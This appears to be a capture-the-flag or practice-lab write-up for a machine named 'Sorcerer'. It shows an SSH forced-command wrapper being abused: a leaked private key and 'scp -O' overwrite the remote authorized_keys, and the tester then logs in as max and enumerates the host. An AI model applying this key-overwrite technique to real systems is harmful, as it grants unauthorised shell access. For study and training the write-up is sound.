SCP
A home directory backup of the max user was discovered in the web server on the port 7742.
It included all the SSH files as well as an interesting Bash script that appear to work in conjunction with SSH inbound connection for the max user
authorized_keys
┌──(kali㉿kali)-[~/…/sorcerer/7742/home/max]
└─$ cat .ssh/authorized_keys
no-port-forwarding,no-X11-forwarding,no-agent-forwarding,no-pty,command="/home/max/scp_wrapper.sh" ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC39t1AvYVZKohnLz6x92nX2cuwMyuKs0qUMW9Pa+zpZk2hb/ZsULBKQgFuITVtahJispqfRY+kqF8RK6Tr0vDcCP4jbCjadJ3mfY+G5rsLbGfek3vb9drJkJ0+lBm8/OEhThwWFjkdas2oBJF8xSg4dxS6jC8wsn7lB+L3xSS7A84RnhXXQGGhjGNfG6epPB83yTV5awDQZfupYCAR/f5jrxzI26jM44KsNqb01pyJlFl+KgOs1pCvXviZi0RgCfKeYq56Qo6Z0z29QvCuQ16wr0x42ICTUuR+Tkv8jexROrLzc+AEk+cBbb/WE/bVbSKsrK3xB9Bl9V9uRJT/faMENIypZceiiEBGwAcT5lW551wqctwi2HwIuv12yyLswYv7uSvRQ1KU/j0K4weZOqDOg1U4+klGi1is3HsFKrUZsQUu3Lg5tHkXWthgtlROda2Q33jX3WsV8P3Z4+idriTMvJnt2NwCDEoxpi/HX/2p0G5Pdga1+gXeXFc88+DZyGVg4yW1cdSR/+jTKmnluC8BGk+hokfGbX3fq9BIeiFebGnIy+py1e4k8qtWTLuGjbhIkPS3PJrhgSzw2o6IXombpeWCMnAXPgZ/x/49OKpkHogQUAoSNwgfdhgmzLz06MVgT+ap0To7VsTvBJYdQiv9kmVXtQQoUCAX0b84fazWQQ== max@sorcerer Looking into the authorized_keys file, it reveals that the /home/max/scp_wrapper.sh file gets executed whenever there is an inbound SSH connection as the max user
scp_wrapper.sh
┌──(kali㉿kali)-[~/…/sorcerer/7742/home/max]
└─$ cat scp_wrapper.sh
#!/bin/bash
case $SSH_ORIGINAL_COMMAND in
'scp'*)
$SSH_ORIGINAL_COMMAND
;;
*)
echo "ACCESS DENIED."
scp
;;
esacThe Bash script above performs the following;
- If the incoming SSH command starts with
scp, it is executed. - Otherwise,
"ACCESS DENIED."is displayed, and an attempt is made to runscp, which may fail.
With the valid SSH private key at possession, it might just be possible to exploit the logic.
SCP Error
┌──(kali㉿kali)-[~/…/sorcerer/7742/home/max]
└─$ scp -i .ssh/id_rsa .ssh/id_rsa.pub max@$IP:/home/max/.ssh/authorized_keys
scp: Received message too long 1094927173
scp: Ensure the remote shell produces no output for non-interactive sessions.Attempting to overwrite to the authorized_keys file with scp fails with error
Solution
/Practice/Sorcerer/3-Exploitation/attachments/{1C5B2AA6-A008-4DB6-9758-11BDF8D6F536}.png)
Looking further into the first error message, I found an online article explaining the reasons behind it
/Practice/Sorcerer/3-Exploitation/attachments/{0E0EF499-5F54-4721-9B34-9D6197ED4AE5}.png)
Digging into the second error message, I found a solution
/Practice/Sorcerer/3-Exploitation/attachments/Pasted-image-20250329001748.png)
The -O flag forces to use the legacy SCP protocol
┌──(kali㉿kali)-[~/…/sorcerer/7742/home/max]
└─$ scp -O -i .ssh/id_rsa .ssh/id_rsa.pub max@$IP:/home/max/.ssh/authorized_keys
id_rsa.pub 100% 738 37.3KB/s 00:00It works
SSH
┌──(kali㉿kali)-[~/…/sorcerer/7742/home/max]
└─$ ssh -i .ssh/id_rsa max@$IP
max@sorcerer:~$ whoami
max
max@sorcerer:~$ hostname
sorcerer
max@sorcerer:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:50:56:9e:cb:57 brd ff:ff:ff:ff:ff:ff
inet 192.168.113.100/24 brd 192.168.113.255 scope global ens192
valid_lft forever preferred_lft foreverInitial Foothold established to the target system as the max user via exploiting the SSH script logic